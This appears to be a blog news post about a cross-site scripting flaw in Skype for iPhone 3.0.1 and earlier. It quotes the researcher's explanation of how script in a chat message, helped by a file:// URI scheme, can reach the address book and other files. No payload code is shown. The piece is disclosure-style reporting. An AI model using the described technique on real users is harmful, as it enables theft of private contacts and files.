Are you currently using Skype for iPhone?, either you better remove it soon as you see this or just leave it without using it, since there’s a cross-site scripting vulnerability revealed in the “Chat Message” window in version 3.0.1 and earlier.

The hole allows attackers to enter malicious JavaScript codes in to users accounts that runs when a user views a chat message making the user’s information including the address book loaded on to a web server (didn’t get it?, see video below).

Heres what the researcher who found the vulnerability got to say :

Executing arbitrary Javascript code is one thing, but I found that Skype also improperly defines the URI scheme used by the built-in webkit browser for Skype. Usually you will see the scheme set to something like, “about:blank” or “skype-randomtoken”, but in this case it is actually set to “file://”. This gives an attacker access to the users file system, and an attacker can access any file that the application itself would be able to access.

File system access is partially mitigated by the iOS Application sandbox that Apple has implemented, preventing an attacker from accessing certain sensitive files. However, every iOS application has access to the users AddressBook, and Skype is no exception.

Also Skype told with TechCrunch that they are aware of the security issue and are working on a fix for it:

“We are working hard to fix this reported issue in our next planned release which we hope to roll out imminently. In the meantime we always recommend people exercise caution in only accepting friend requests from people they know and practice common sense internet security as always.”

Below is the video embedded which shows this in action:

Let’s hope the fix will come soon. Until then you can Subscribe to our RSS feed , Follow us on Twitter and also become a fan on our Facebook page, we will keep you updated with posts over the web.